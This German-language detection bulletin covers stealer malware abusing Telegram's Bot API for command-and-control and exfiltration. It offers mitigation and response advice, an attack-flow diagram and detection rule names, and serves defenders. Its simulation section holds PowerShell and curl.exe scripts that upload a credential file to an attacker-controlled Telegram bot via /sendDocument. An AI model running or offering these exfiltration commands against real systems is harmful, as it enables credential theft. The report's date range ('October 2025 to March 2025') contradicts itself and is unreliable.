Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Artikel erklärt, wie mehrere Bedrohungsakteure die Bot-API und Kanäle von Telegram in Unternehmen für Befehls- und Kontrollfunktionen, Datenextraktion und Opferüberwachung missbrauchen. Malware-Familien, darunter DeerStealer, Lumma Stealer, Raven Stealer und ein trojanisierter XWorm-Builder, codieren Bot-Tokens oder Kanal-IDs fest ein und rufen Endpunkte wie /sendMessage und /sendDocument auf. Es werden Microsoft Defender und Sentinel-Erkennungsabfragen vorgestellt, die sich auf verdächtige Prozessbefehlszeilen und Traffic zu api.telegram.orgkonzentrieren. Wichtige Anleitungen sind: Die legitime Nutzung von Telegram zu bereinigen und die API dort zu blockieren, wo sie nicht benötigt wird.
Untersuchung
Das SOC von NVISO berichtete über vier Eindringversuche, die zwischen Oktober 2025 und März 2025 beobachtet wurden, bei denen Telegram an verschiedenen Punkten im Angriffszyklus verwendet wurde. Das Schreiben hebt Kampagnen hervor, wie das Überwachen von Opfern durch Lunar Spider über gefälschte Captcha-Köder, das Senden von Operator-Benachrichtigungen durch DeerStealer über curl, das Abrufen von C2-Details von Telegram-Kanälen durch Lumma Stealer, das Exfiltrieren von archivierten Sammlungen durch Raven Stealer und das Abstützen eines XWorm-Builders auf die Bot-API sowohl für Exfiltration als auch für C2. Analytiker extrahierten Indikatoren wie Prozessbefehlszeilen, Netzwerkziele und relevante Dateinamen.
Minderung
Erstellen Sie einen Standard für die legitime Nutzung von Telegram und blockieren Sie dann den ausgehenden Zugang zu api.telegram.org in Umgebungen, in denen er nicht benötigt wird. Achten Sie auf ungewöhnliche Prozesse (z. B. curl, powershell, wscript), die Verbindungen zur API herstellen, und untersuchen Sie jede geskriptete Bot-API-Interaktion. Passen Sie die Erkennungen an, um erwartetes Verhalten wie bekannte Browser, die telegram.exe starten, zu unterdrücken, und priorisieren Sie Long-Polling- oder Webhook-Style-Anfragen, die von verdächtigen Binärdateien oder unerwarteten Hosts ausgehen.
Antwort
Wenn eine Aktivität erkannt wird, isolieren Sie den betroffenen Endpunkt, stoppen Sie verdächtige Prozesse und bewahren Sie Befehlszeilenparameter zusammen mit DNS-, Proxy- und Netzwerk-Telemetrie auf. Führen Sie eine tiefere forensische Analyse durch, um nachfolgende Payloads aufzudecken, die mit Kampagnen wie DeerStealer oder Raven Stealer verbunden sind. Rotieren Sie alle exponierten Bot-Tokens, deaktivieren oder widerrufen Sie missbrauchte Telegram-Kanäle, und stoppen Sie die Verbreitung durch das Blockieren verwandter Indikatoren. Wenn der Missbrauch bestätigt wird, eskalieren Sie die Meldung durch die offiziellen Kanäle von Telegram und dokumentieren Sie den Vorfall zur Verhinderung eines Wiederauftretens.
„graph TB %% Klassen Definitionen classDef technique fill:#ffcc99 classDef tool fill:#c2f0c2 classDef process fill:#c2d6f0 classDef malware fill:#f9c2ff classDef operator fill:#ff9900 %% Knoten u2013 Techniken attack_user_execution[„<b>Technik</b> – <b>T1204 Benutzer Ausführung</b>: Opfer werden dazu verleitet, eine bösartige ausführbare Datei zu starten, die in einem gefälschten Google Chrome-Update gebündelt ist.“] class attack_user_execution technique attack_software_extensions[„<b>Technik</b> – <b>T1176 Software-Erweiterungen</b>: Ein kompromittiertes WordPress-Plugin injiziert bösartige iframes, um das gefälschte Update zu liefern.“] class attack_software_extensions technique action_archive_data[„<b>Technik</b> – <b>T1560.001 Archivierung über Dienstprogramm</b>: PowerShell archiviert gesammelte Dateien in einem ZIP-Archiv.“] class action_archive_data technique tech_compression[„<b>Technik</b> – <b>T1027.015 Kompression</b>: ZIP-Archiv komprimiert Daten, um die Größe für die Exfiltration zu reduzieren.“] class tech_compression technique process_powershell[„<b>Prozess</b> – <b>T1059.001 PowerShell</b>: Führt Archivierung aus und ruft später curl zur Übertragung auf.“] class process_powershell process action_curl[„<b>Aktion</b> – Curl: PowerShell ruft curl auf, um das Archiv an den C2-Server zu senden.“] class action_curl tool tech_dead_drop[„<b>Technik</b> – <b>T1102.001 Dead Drop Resolver</b>: Malware kommuniziert mit Telegram Bot API Endpunkten.“] class tech_dead_drop technique tech_messaging_exfil[„<b>Technik</b> – <b>T1213.005 Nachrichtenanwendungen</b>: Systeminformationen und Anmeldedaten werden über Telegram-Chats/-Bots exfiltriert.“] class tech_messaging_exfil technique tech_unsecured_creds[„<b>Technik</b> – <b>T1552.008 Ungesicherte Anmeldedaten</b>: Discord-Tokens und gespeicherte Passwörter werden als Chat-Nachrichten gesendet.“] class tech_unsecured_creds technique tech_data_obfusc[„<b>Technik</b> – <b>T1001 Datenverschleierung</b>: Telegram-Kanalnamen werden mit ROT13/ROT15 verschlüsselt.“] class tech_data_obfusc technique tech_dynamic_resolution[„<b>Technik</b> – <b>T1568 Dynamische Auflösung</b>: Malware dekodiert den verschleierten Bezeichner zur Laufzeit.“] class tech_dynamic_resolution technique tech_exfil_c2[„<b>Technik</b> – <b>T1041 Exfiltrierung über C2-Kanal</b>: Komprimiertes Archiv und gestohlene Daten werden über den Telegram-Kanal gesendet.“] class tech_exfil_c2 technique %% Knoten u2013 Tools / Malware tool_fake_update[„<b>Malware</b> – Gefälschtes Chrome-Update: Bösartige ausführbare Datei, die an Opfer geliefert wird.“] class tool_fake_update malware tool_wordpress_plugin[„<b>Tool</b> – WordPress Plugin <i>header-fix-tester</i>: Injektiert bösartige iframes.“] class tool_wordpress_plugin tool %% Betreiberknoten (optional) op_and1((„AND“)) class op_and1 operator %% Verbindungen u2013 Angriffsfluss attack_user_execution u002du002d>|liefert| tool_fake_update attack_software_extensions u002du002d>|injiziert iframe um zu liefern| tool_fake_update tool_fake_update u002du002d>|führt aus via| process_powershell process_powershell u002du002d>|erstellt| action_archive_data action_archive_data u002du002d>|wendet an| tech_compression tech_compression u002du002d>|produziert Archiv für| action_curl action_curl u002du002d>|sendet Daten an| tech_dead_drop tech_dead_drop u002du002d>|ermöglicht| tech_messaging_exfil tech_messaging_exfil u002du002d>|transportiert| tech_unsecured_creds tech_unsecured_creds u002du002d>|verwendet| tech_data_obfusc tech_data_obfusc u002du002d>|unterstützt| tech_dynamic_resolution tech_dynamic_resolution u002du002d>|ermöglicht| tech_exfil_c2 tech_exfil_c2 u002du002d>|exfiltriert Daten über| tech_dead_drop %% Klassenzuweisungen class tool_fake_update malware class tool_wordpress_plugin tool class op_and1 operator „
Angriffsfluss
Erkennungen
Möglicher Telegram-Missbrauch als Befehls- und Kontrollkanal (über dns_query)
Ansicht
Verdächtige Defender-Ausnahmemodifikation (via cmdline)
Ansicht
Verdächtiger Prozess nutzt eine URL in der Befehlszeile (via cmdline)
Ansicht
IOCs (Emails) zur Erkennung: Die Chronicles der Erkennung & Reaktion: Untersuchung von Telegram-Missbrauch
Ansicht
Erkennung nicht-browserbasierter Kommunikation mit Telegram API [Windows-Netzwerkverbindung]
Ansicht
Erkennung bösartiger Telegram API Nutzung [Windows-Prozesserstellung]
Ansicht
Simulationsausführung
Voraussetzung: Die Vorflugprüfung Telemetrie & Basislinie muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der von der Gegenpartei gewünschten Technik (TTP), die die Erkennungsregel auslösen soll. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die exakte Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffserzählung & Befehle:
Ein Angreifer mit einem kompromittierten Windows-Host möchte eine gesammelte Anmeldedatei (creds.txt) an einen von ihnen kontrollierten Telegram-Bot exfiltrieren. Um das Speichern einer benutzerdefinierten Binärdatei zu vermeiden, verwenden sie das nativecurl.exe(installiert über Windows 10 optionale Funktionen), um die Datei anhttps://api.telegram.org/bot<ATTACKER_TOKEN>/sendDocumentzu POSTen. Der Befehl wird von PowerShell aus ausgeführt, um sicherzustellen, dass das Ereignis der Prozesserstellung eine Befehlszeile aufzeichnet, die „api.telegram.org“ enthält. Da der Prozesscurl.exeist, unterdrückt der Filter der Regel (InitiatingProcessFileName: "telegram.exe") nicht den Alarm.# Variablen (ersetzen mit Angreifer-kontrollierten Werten) $BotToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11" $ChatID = "987654321" $FilePath = "C:Tempcreds.txt" # Sicherstellen, dass die Datei existiert (simulierter Anmeldedaten-Dump) Set-Content -Path $FilePath -Value "username: admin`npassword: P@ssw0rd!" # Durchführung der Exfiltration über Telegram Bot API $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID" curl.exe -X POST -F "document=@$FilePath" $Url -
Regressionstest-Skript: Das folgende Skript reproduziert die genauen Schritte, geeignet für automatisierte BAS-Abläufe.
#-------------------------------------------- # Regressionstest – Telegram API Exfiltration #-------------------------------------------- param( [string]$BotToken = "REPLACE_WITH_TOKEN", [string]$ChatID = "REPLACE_WITH_CHATID", [string]$TmpDir = "$env:TEMPTelegramBAS" ) # Erstellen Sie einen temporären Arbeitsbereich New-Item -ItemType Directory -Path $TmpDir -Force | Out-Null # Simulierte Anmeldedatei $CredFile = Join-Path $TmpDir "creds.txt" "username: admin`npassword: P@ssw0rd!" | Set-Content -Path $CredFile # API-URL erstellen $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID" # Durchführung der Exfiltration Write-Host "[*] Exfiltriere $CredFile an Telegram..." curl.exe -X POST -F "document=@$CredFile" $Url # Einfache Erfolgsmeldung (verifiziert nicht die Lieferung) if ($LASTEXITCODE -eq 0) { Write-Host "[+] Exfiltrationsbefehl ausgeführt." } else { Write-Error "[-] Exfiltration fehlgeschlagen." } -
Bereinigungskommandos: Entfernen Sie die temporäre Datei und das Verzeichnis; optional beenden Sie alle verbleibenden
curl.exeProzesse.# Bereinigung temporärer Artefakte Stop-Process -Name "curl" -ErrorAction SilentlyContinue Remove-Item -Path $TmpDir -Recurse -Force Write-Host "[*] Bereinigung abgeschlossen."